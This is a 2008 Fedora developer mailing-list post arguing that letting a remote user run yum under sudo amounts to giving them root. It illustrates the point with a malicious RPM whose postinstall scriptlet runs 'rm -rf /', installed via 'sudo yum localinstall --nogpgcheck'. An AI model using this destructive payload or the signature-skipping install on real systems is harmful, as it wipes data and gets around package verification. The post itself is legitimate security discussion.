Security Changes For Fedora 9

Eric Rannaud eric.rannaud at gmail.com
Mon Jan 14 19:16:10 UTC 2008


On Jan 10, 2008 10:26 PM, Ville Skyttä <ville.skytta at iki.fi> wrote:
> On Saturday 05 January 2008, Kevin Fenzi wrote:
> >
> > I find root ssh login handy for a number of reasons:
> [...]
> > - It's nice to be able to do for automated tasks (like say installing a
> > single new package on 20 machines without having to login and sudo on
> > each).
>
> "ssh -t $host sudo yum install $package" works for me...

What about (supposing I know the password of non-root user 'foo', and
assuming that 'foo' can sudo yum):

[hacker@tooeasy]$ rpm -qp --scripts hackers_pkg.rpm
postinstall scriptlet (using /bin/sh):
rm -rf /
exit 0
[hacker@tooeasy]$ scp -p hackers_pkg.rpm foo@host:
[hacker@tooeasy]$ ssh -t foo@host sudo yum localinstall --nogpgcheck ./hackers_pkg.rpm


Am I wrong in assuming that yum is not necessarily a safe command to
be used with sudo? Or more exactly, that there is no point in blocking
root ssh logins if you're going to let a user that can login remotely
use sudo on yum?

Thanks.



